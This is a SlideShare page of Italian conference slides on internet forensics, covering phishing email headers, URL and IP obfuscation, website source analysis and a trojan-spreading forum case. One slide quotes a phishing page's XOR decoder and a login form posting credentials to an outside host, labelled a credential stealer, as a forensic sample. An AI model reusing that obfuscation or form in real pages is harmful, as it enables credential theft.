SlideShare a Scribd company logo

Internet Forensics

Gianni Amato
Gianni Amato

Internet Forensics

Technology
1 of 39
Download to read offline
INTERNET FORENSICS di Gianni Amato 18/06/2008 Convegno CFItaly – Libera Università degli Studi S. Pio V, Roma Gianni Amato http://www.cfitaly.net 1
About me (in breve)  Ricercatore indipendente  Pentest & Vulnerability Assessment  Consulente di sicurezza informatica  Collaborazioni Internet Magazine Associazione Meter Gianni Amato http://www.cfitaly.net 2
Internet non ha confini!  Chi crede di rimanere anonimo finché non  fornisce i propri dati personali si sbaglia di  grosso. Gianni Amato http://www.cfitaly.net 3
Internet Forensics? Reati commessi  Reati commessi  su Internet mediante Internet Gianni Amato http://www.cfitaly.net 4
Quali reati?  pedopornografia  terrorismo  phishing  frodi  ...altre tipologie di reato   diffamazioni, violazione della sfera personale,  spam, defacing, intrusioni, malware... Gianni Amato http://www.cfitaly.net 5
Iter  Individuare e valutare le cause;  Analizzare e comprendere le  dinamiche;  Documentare e fornire gli indizi; Gianni Amato http://www.cfitaly.net 6
Phishing: tutto parte da una  (fake) email (?)  Social Engineering  ..lo studio del comportamento individuale di  una persona al fine di carpire informazioni. Gianni Amato http://www.cfitaly.net 7
Come recuperano gli  indirizzi email?  Generati casualmente  Acquistati  Bot a caccia di chiocciole Gianni Amato http://www.cfitaly.net 8
Vero o falso? ? Oggetto:  Eseguiamo la manutenzione delle nostre misure di sicurezza Da:  quot;Poste italianequot; <Admin@bancopostaonline.poste.it> Rispondi:  quot;Poste italianequot; <Admin@bancopostaonline.poste.it>  Data:  29/05/2008 18:26 A: guelfoweb@gmail.com  Partiamo dagli headers  Percorso (MTA) seguito dall'email per raggiungerci (Recived:)  disposto in ordine inverso  Data, ora, protocollo, indirizzo ip Gianni Amato http://www.cfitaly.net 9
Delivered­To: guelfoweb@gmail.com Received: by 10.142.162.2 with SMTP id k2cs28985wfe;         Thu, 29 May 2008 09:26:09 ­0700 (PDT) Received: by 10.86.54.3 with SMTP id c3mr4230fga.55.1212078368105; H         Thu, 29 May 2008 09:26:08 ­0700 (PDT) e Return­Path: <Admin@bancopostaonline.poste.it> a Received: from smtp21.orange.fr (smtp21.orange.fr [80.12.242.48]) d         by mx.google.com with ESMTP id l12si757120fgb.8.2008.05.29.09.26.04; e         Thu, 29 May 2008 09:26:08 ­0700 (PDT) r Received­SPF: neutral (google.com: 80.12.242.48 is neither permitted nor denied by  best guess record for domain of Admin@bancopostaonline.poste.it) client­ ip=80.12.242.48; Authentication­Results: mx.google.com; spf=neutral (google.com: 80.12.242.48 is  neither permitted nor denied by best guess record for domain of  Admin@bancopostaonline.poste.it) smtp.mail=Admin@bancopostaonline.poste.it Gianni Amato http://www.cfitaly.net 10
Received: from User (ks3825.kimsufi.com [213.186.40.121]) by mwinf2114.orange.fr (SMTP Server) with ESMTP id AB8AC1C0011C; Thu, 29 May 2008 18:26:03 +0200 (CEST) X­ME­UUID: 20080529162603702.AB8AC1C0011C@mwinf2114.orange.fr From: quot;Poste italianequot; <Admin@bancopostaonline.poste.it> H e Subject: Eseguiamo la manutenzione delle nostre misure di sicurezza a Date: Thu, 29 May 2008 18:26:03 +0200 d MIME­Version: 1.0 e Content­Type: text/html; r charset=quot;Windows­1251quot; Content­Transfer­Encoding: 7bit X­Priority: 3 X­MSMail­Priority: Normal X­Mailer: Microsoft Outlook Express 6.00.2600.0000 X­MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message­Id: <20080529162603.AB8AC1C0011C@mwinf2114.orange.fr> Gianni Amato http://www.cfitaly.net 11
Interrogare i server, i motori di  ricerca e le blacklists  whois  traceroute  blacklist  http://mxtoolbox.com/blacklists.aspx Gianni Amato http://www.cfitaly.net 12
Criminali furbi  Fake headers  Proxy anonimi (HTTP Proxy, SOCKS, ecc.)  Relay aperti (SMTP)  Reti WiFi aperte o poco protette  Botnet Gianni Amato http://www.cfitaly.net 13
Url encoding  http://www.sitoweb.it/?url=sitotarget.it  http://www.sitoweb.it/?url=%67%6F%6F%67%6C%......  IP : 22.22.22.22  Octal : 0026.0026.0026.0026  Hex : 0x16.0x16.0x16.0x16  Dotless: 370546198 Gianni Amato http://www.cfitaly.net 14
Analisi di un sito web  Analisi preliminare  Analisi del codice  Indagini temporali  Indagini avanzate Gianni Amato http://www.cfitaly.net 15
Analisi preliminare  Navigare e catalogare il sito  Individuare i collegamenti relativi  es. css e script esterni  Il codice fa la differenza Gianni Amato http://www.cfitaly.net 16
Analisi preliminare xss Sfruttare le  vulnerabilità  dei siti web  code  Fake per iniettare  injection codice  arbitrario <iframe> Gianni Amato http://www.cfitaly.net 17
Analisi preliminare Gianni Amato Fake http://www.cfitaly.net 18
Analisi del codice  Scaricare il codice sorgente in locale  Browser (Firefox, Opera, Internet Explorer)  Amaya  Wget wget ­m ­k http://www.sitoweb.it n.b. fare attenzione ai limiti di banda Gianni Amato http://www.cfitaly.net 19
Analisi del codice  Interpretare la struttura del codice  Codice lungo e poco ordinato  Meccanica incomprensibile  soprattutto se il codice è offuscato  Link, tag e formattazioni Gianni Amato http://www.cfitaly.net 20
Analisi del codice Javascript  Escape e Unescape;  Base64;  1000 modi per inventarsi una funzione di  codifica; Gianni Amato http://www.cfitaly.net 21
Analisi del codice Ok, ora è tutto chiaro !? Gianni Amato http://www.cfitaly.net 22
Analisi del codice  Commento  <!­­hppage status­”protected”­­>  Esiste sempre un punto di partenza  document.write(unescape(“%3C%53%43... Gianni Amato http://www.cfitaly.net 23
Analisi del codice <SCRIPT LANGUAGE=quot;JavaScriptquot;><!­­ hp_ok=true;function hp_d01(s){if(!hp_ok)return; var o=quot;quot;,ar=new Array(),os=quot;quot;,ic=0; for(i=0;i<s.length;i++){c=s.charCodeAt(i); script code if(c<128)c=c^2; os+=String.fromCharCode(c); if(os.length>80){ar[ic++]=os;os=quot;quot;}}o=ar.join(quot;quot;) +os;document.write(o)}//­­></SCRIPT> <form name=quot;Form_Authquot;  Credential Stealer action=quot;http://www.biohasardz.com/memo/images/1.phpquot;  method=quot;postquot;> ........... Gianni Amato http://www.cfitaly.net 24
Analisi del codice  Individuare (se presenti) i metadati  alcuni software utilizzati per lo sviluppo delle  pagine web aggiungono informazioni al codice  Nome del programma utilizzato  Il nome dell'autore autore  Numero di revisioni  Data e ora Gianni Amato http://www.cfitaly.net 25
Analisi del codice <!DOCTYPE HTML PUBLIC quot;­//W3C//DTD HTML 4.0 Transitional//ENquot;> <HTML> <HEAD> <META HTTP­EQUIV=quot;CONTENT­TYPEquot; CONTENT=quot;text/html; charset=utf­8quot;> <TITLE></TITLE> <META NAME=quot;GENERATORquot; CONTENT=quot;OpenOffice.org 2.3  (Linux)quot;> <META NAME=quot;AUTHORquot; CONTENT=quot;guelfowebquot;> <META NAME=quot;CREATEDquot; CONTENT=quot;20080614;18464300quot;> <META NAME=quot;CHANGEDBYquot; CONTENT=quot;guelfowebquot;> <META NAME=quot;CHANGEDquot; CONTENT=quot;20080614;18472200quot;> <STYLE TYPE=quot;text/cssquot;> <!­­ @page { size: 21cm 29.7cm; margin: 2cm } P { margin­bottom: 0.21cm } ­­> </STYLE> </HEAD> <BODY LANG=quot;it­ITquot; DIR=quot;LTRquot;> <P STYLE=quot;margin­bottom: 0cmquot;>questa &egrave; una pagina web</P> </BODY> </HTML> Gianni Amato http://www.cfitaly.net 26
Analisi del codice  Indizi da non trascurare  Errori  Commenti  Istruzioni commentate Possono fornire importanti informazioni! Gianni Amato http://www.cfitaly.net 27
Indagine temporale Evoluzione del sito e vecchi contenuti  The Wayback Machine  archive.org  Google Cache Gianni Amato http://www.cfitaly.net 28
Indagine avanzata  Directory listings  Hidden directories  Hidden files  Hidden subdomains Gianni Amato http://www.cfitaly.net 29
Indagine avanzata Gianni Amato http://www.cfitaly.net 30
Indagine avanzata  Le direttive del file robots.txt  invita gli spiders dei motori di ricerca a non  leggere o non indicizzare determinate pagine  web;  aiuta gli investigatori a individuare i contenuti  che il webmaster ha scelto, per qual si voglia  motivo, di tenere nascosti; Gianni Amato http://www.cfitaly.net 31
Indagine avanzata  Non utilizzare tools aggressivi che  potrebbero compromettere il sistema e  di conseguenza infangare le prove Gianni Amato http://www.cfitaly.net 32
Case history Associazione Meter – Don Fortunato Di Noto  Dalla pedopornografia al virus passando  per un forum. Gianni Amato http://www.cfitaly.net 33
Case history Associazione Meter – Don Fortunato Di Noto  All'interno del forum del sito web (xxx),  oggetto di indagine, sono state rilevate  immagini a carattere pornografico e  pedopornografico Gianni Amato http://www.cfitaly.net 34
Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  il forum era stato abbandonato da quasi 3 anni;  era stato compromesso sfruttando una  vulnerabilità nota della piattaforma di gestione;  erano state inserite delle keywords per scalare  posizione nei motori di ricerca; Gianni Amato http://www.cfitaly.net 35
Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  la presenza di immagini pornografiche e  pedopornografiche era solo un pretesto per  invitare l'utente a cliccarci sopra e scaricare un  trojan che si spacciava per un codec;  il trojan implementava funzionalità di backdoor  che consentiva ai criminali di creare un botnet; Gianni Amato http://www.cfitaly.net 36
Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  il trojan risiedeva su un server straniero;  una volta infettata la macchina, il trojan  comunicava con diversi siti su server stranieri;  le date di registrazione dei siti coincidevano o  differivano di qualche giorno; Gianni Amato http://www.cfitaly.net 37
Case history Associazione Meter – Don Fortunato Di Noto  Tra il 2007 e 2008 sono stati individuati 15  casi analoghi  Principali vittime:  Comuni  Scuole  Università Gianni Amato http://www.cfitaly.net 38
CONTATTI Gianni Amato  http://www.gianniamato.it E­Mail: gianni@gianniamato.it Cell. +39­3202842382 Gianni Amato http://www.cfitaly.net 39

Recommended

Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013Gianni Amato
 
Web 2.0 e dintorni
Web 2.0 e dintorniWeb 2.0 e dintorni
Web 2.0 e dintorniGianni Amato
 
Hashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneHashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneGianni Amato
 
Romagnacamp13 socialmediaengineering
Romagnacamp13 socialmediaengineeringRomagnacamp13 socialmediaengineering
Romagnacamp13 socialmediaengineeringPiero Tagliapietra
 
Portarsi A Casa Uno Stipendo Con Wordpress
Portarsi A Casa Uno Stipendo Con WordpressPortarsi A Casa Uno Stipendo Con Wordpress
Portarsi A Casa Uno Stipendo Con WordpressLuca Mercatanti
 
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of TrustIl Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of TrustSimone Onofri
 
Stop Spam in google analytics report
Stop Spam in google analytics reportStop Spam in google analytics report
Stop Spam in google analytics reportE2 Ict Snc
 
Riccardo Govoni - Search
Riccardo Govoni - SearchRiccardo Govoni - Search
Riccardo Govoni - SearchSocial Media Lab
 

Recommended

Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013Gianni Amato
 
Web 2.0 e dintorni
Web 2.0 e dintorniWeb 2.0 e dintorni
Web 2.0 e dintorniGianni Amato
 
Hashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneHashbot.com - Acquisizione e Validazione
Hashbot.com - Acquisizione e ValidazioneGianni Amato
 
Romagnacamp13 socialmediaengineering
Romagnacamp13 socialmediaengineeringRomagnacamp13 socialmediaengineering
Romagnacamp13 socialmediaengineeringPiero Tagliapietra
 
Portarsi A Casa Uno Stipendo Con Wordpress
Portarsi A Casa Uno Stipendo Con WordpressPortarsi A Casa Uno Stipendo Con Wordpress
Portarsi A Casa Uno Stipendo Con WordpressLuca Mercatanti
 
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of TrustIl Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of TrustSimone Onofri
 
Stop Spam in google analytics report
Stop Spam in google analytics reportStop Spam in google analytics report
Stop Spam in google analytics reportE2 Ict Snc
 
Riccardo Govoni - Search
Riccardo Govoni - SearchRiccardo Govoni - Search
Riccardo Govoni - SearchSocial Media Lab
 
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...Gianfranco Tonello
 
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"guest2c6b3
 
Monitoraggio della rete con cacti
Monitoraggio della rete con cactiMonitoraggio della rete con cacti
Monitoraggio della rete con cactidalegiuseppe
 
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Matteo Makovec
 
Web Application Insecurity Uncensored
Web Application Insecurity UncensoredWeb Application Insecurity Uncensored
Web Application Insecurity Uncensoredjekil
 
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016Giovanni Sacheli
 
Bitcoin in codice - Parte 2
Bitcoin in codice - Parte 2Bitcoin in codice - Parte 2
Bitcoin in codice - Parte 2Giancarlo Valente
 
WebRTC prove pratiche, esperimenti e curiosità
WebRTC prove pratiche, esperimenti e curiositàWebRTC prove pratiche, esperimenti e curiosità
WebRTC prove pratiche, esperimenti e curiositàComparto Web
 
Hackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriHackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriCodemotion
 
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Matteo Makovec
 
HTML5 Security
HTML5 SecurityHTML5 Security
HTML5 SecuritySimone Onofri
 
Web Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewWeb Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewAntonio Parata
 
Template Multidevice con TYPO3
Template Multidevice con TYPO3Template Multidevice con TYPO3
Template Multidevice con TYPO3Nicola Della Marina
 
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018Giovanni Sacheli
 
Session isolation e rendering delle pagine web
Session isolation e rendering delle pagine webSession isolation e rendering delle pagine web
Session isolation e rendering delle pagine webGiacomo Zecchini
 
Internet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trustInternet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trustDavide Carboni
 
Be wizard 2012 - content - seo - links - gianluca fiorelli
Be wizard 2012 - content - seo - links - gianluca fiorelliBe wizard 2012 - content - seo - links - gianluca fiorelli
Be wizard 2012 - content - seo - links - gianluca fiorelliGianluca Fiorelli
 
Google Hacking
Google HackingGoogle Hacking
Google HackingEduard Roccatello
 
Realizzazione di un workflow integrato per la rilevazione di domini phishing
Realizzazione di un workflow integrato per la rilevazione di domini phishingRealizzazione di un workflow integrato per la rilevazione di domini phishing
Realizzazione di un workflow integrato per la rilevazione di domini phishingGiuliaMilan4
 
Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malwareGianni Amato
 
Open Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioOpen Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioGianni Amato
 
DOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence PlatformDOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence PlatformGianni Amato
 

More Related Content

Similar to Internet Forensics

Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...Gianfranco Tonello
 
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"guest2c6b3
 
Monitoraggio della rete con cacti
Monitoraggio della rete con cactiMonitoraggio della rete con cacti
Monitoraggio della rete con cactidalegiuseppe
 
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Matteo Makovec
 
Web Application Insecurity Uncensored
Web Application Insecurity UncensoredWeb Application Insecurity Uncensored
Web Application Insecurity Uncensoredjekil
 
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016Giovanni Sacheli
 
WebRTC prove pratiche, esperimenti e curiosità
WebRTC prove pratiche, esperimenti e curiositàWebRTC prove pratiche, esperimenti e curiosità
WebRTC prove pratiche, esperimenti e curiositàComparto Web
 
Hackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriHackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriCodemotion
 
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Matteo Makovec
 
Web Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewWeb Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewAntonio Parata
 
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018Giovanni Sacheli
 
Session isolation e rendering delle pagine web
Session isolation e rendering delle pagine webSession isolation e rendering delle pagine web
Session isolation e rendering delle pagine webGiacomo Zecchini
 
Internet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trustInternet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trustDavide Carboni
 
Be wizard 2012 - content - seo - links - gianluca fiorelli
Be wizard 2012 - content - seo - links - gianluca fiorelliBe wizard 2012 - content - seo - links - gianluca fiorelli
Be wizard 2012 - content - seo - links - gianluca fiorelliGianluca Fiorelli
 
Realizzazione di un workflow integrato per la rilevazione di domini phishing
Realizzazione di un workflow integrato per la rilevazione di domini phishingRealizzazione di un workflow integrato per la rilevazione di domini phishing
Realizzazione di un workflow integrato per la rilevazione di domini phishingGiuliaMilan4
 
Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malwareGianni Amato
 

Similar to Internet Forensics (20)

Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
 
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"
SMAU 2008: "Vulnerabilità in Tomcat: l'evoluzione della specie"
 
Monitoraggio della rete con cacti
Monitoraggio della rete con cactiMonitoraggio della rete con cacti
Monitoraggio della rete con cacti
 
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
 
Web Application Insecurity Uncensored
Web Application Insecurity UncensoredWeb Application Insecurity Uncensored
Web Application Insecurity Uncensored
 
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016
Scansioni avanzate con Screaming Frog - Advanced SEO Tools 2016
 
Bitcoin in codice - Parte 2
Bitcoin in codice - Parte 2Bitcoin in codice - Parte 2
Bitcoin in codice - Parte 2
 
WebRTC prove pratiche, esperimenti e curiosità
WebRTC prove pratiche, esperimenti e curiositàWebRTC prove pratiche, esperimenti e curiosità
WebRTC prove pratiche, esperimenti e curiosità
 
Hackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriHackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone Onofri
 
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
 
HTML5 Security
HTML5 SecurityHTML5 Security
HTML5 Security
 
Web Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewWeb Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code Review
 
Template Multidevice con TYPO3
Template Multidevice con TYPO3Template Multidevice con TYPO3
Template Multidevice con TYPO3
 
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018
Technical SEO Audit Checklist - Giovanni Sacheli Search Marketing Connect 2018
 
Session isolation e rendering delle pagine web
Session isolation e rendering delle pagine webSession isolation e rendering delle pagine web
Session isolation e rendering delle pagine web
 
Internet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trustInternet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trust
 
Be wizard 2012 - content - seo - links - gianluca fiorelli
Be wizard 2012 - content - seo - links - gianluca fiorelliBe wizard 2012 - content - seo - links - gianluca fiorelli
Be wizard 2012 - content - seo - links - gianluca fiorelli
 
Google Hacking
Google HackingGoogle Hacking
Google Hacking
 
Realizzazione di un workflow integrato per la rilevazione di domini phishing
Realizzazione di un workflow integrato per la rilevazione di domini phishingRealizzazione di un workflow integrato per la rilevazione di domini phishing
Realizzazione di un workflow integrato per la rilevazione di domini phishing
 
Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malware
 

More from Gianni Amato

Open Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioOpen Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioGianni Amato
 
DOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence PlatformDOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence PlatformGianni Amato
 
Il venerdì nero di wannacry
Il venerdì nero di wannacryIl venerdì nero di wannacry
Il venerdì nero di wannacryGianni Amato
 
Il CERT-PA e la Malware Analysis: Strumenti e casi di studio
Il CERT-PA e la Malware Analysis: Strumenti e casi di studioIl CERT-PA e la Malware Analysis: Strumenti e casi di studio
Il CERT-PA e la Malware Analysis: Strumenti e casi di studioGianni Amato
 
Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Gianni Amato
 
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Gianni Amato
 
Linuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockLinuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockGianni Amato
 
Linuxday 2013-amato
Linuxday 2013-amatoLinuxday 2013-amato
Linuxday 2013-amatoGianni Amato
 
Crimini Informatici 2012
Crimini Informatici 2012Crimini Informatici 2012
Crimini Informatici 2012Gianni Amato
 
Reati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliReati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliGianni Amato
 
Malware Analysis. A Case Study
Malware Analysis. A Case StudyMalware Analysis. A Case Study
Malware Analysis. A Case StudyGianni Amato
 

More from Gianni Amato (12)

Open Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioOpen Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggio
 
DOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence PlatformDOVINCI - Cyber Threat Intelligence Platform
DOVINCI - Cyber Threat Intelligence Platform
 
Il venerdì nero di wannacry
Il venerdì nero di wannacryIl venerdì nero di wannacry
Il venerdì nero di wannacry
 
Il CERT-PA e la Malware Analysis: Strumenti e casi di studio
Il CERT-PA e la Malware Analysis: Strumenti e casi di studioIl CERT-PA e la Malware Analysis: Strumenti e casi di studio
Il CERT-PA e la Malware Analysis: Strumenti e casi di studio
 
Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016Il Ransomware nelle Aziende - Eset Security Days 2016
Il Ransomware nelle Aziende - Eset Security Days 2016
 
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
 
Linuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - ShellshockLinuxday 2014 Amato - Shellshock
Linuxday 2014 Amato - Shellshock
 
Linuxday 2013-amato
Linuxday 2013-amatoLinuxday 2013-amato
Linuxday 2013-amato
 
Crimini Informatici 2012
Crimini Informatici 2012Crimini Informatici 2012
Crimini Informatici 2012
 
Reati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni DigitaliReati Informatici e Investigazioni Digitali
Reati Informatici e Investigazioni Digitali
 
Malware Analysis. A Case Study
Malware Analysis. A Case StudyMalware Analysis. A Case Study
Malware Analysis. A Case Study
 
Firma Digitale
Firma DigitaleFirma Digitale
Firma Digitale
 

Internet Forensics

  • 1. INTERNET FORENSICS di Gianni Amato 18/06/2008 Convegno CFItaly – Libera Università degli Studi S. Pio V, Roma Gianni Amato http://www.cfitaly.net 1
  • 2. About me (in breve)  Ricercatore indipendente  Pentest & Vulnerability Assessment  Consulente di sicurezza informatica  Collaborazioni Internet Magazine Associazione Meter Gianni Amato http://www.cfitaly.net 2
  • 3. Internet non ha confini!  Chi crede di rimanere anonimo finché non  fornisce i propri dati personali si sbaglia di  grosso. Gianni Amato http://www.cfitaly.net 3
  • 4. Internet Forensics? Reati commessi  Reati commessi  su Internet mediante Internet Gianni Amato http://www.cfitaly.net 4
  • 5. Quali reati?  pedopornografia  terrorismo  phishing  frodi  ...altre tipologie di reato   diffamazioni, violazione della sfera personale,  spam, defacing, intrusioni, malware... Gianni Amato http://www.cfitaly.net 5
  • 6. Iter  Individuare e valutare le cause;  Analizzare e comprendere le  dinamiche;  Documentare e fornire gli indizi; Gianni Amato http://www.cfitaly.net 6
  • 7. Phishing: tutto parte da una  (fake) email (?)  Social Engineering  ..lo studio del comportamento individuale di  una persona al fine di carpire informazioni. Gianni Amato http://www.cfitaly.net 7
  • 8. Come recuperano gli  indirizzi email?  Generati casualmente  Acquistati  Bot a caccia di chiocciole Gianni Amato http://www.cfitaly.net 8
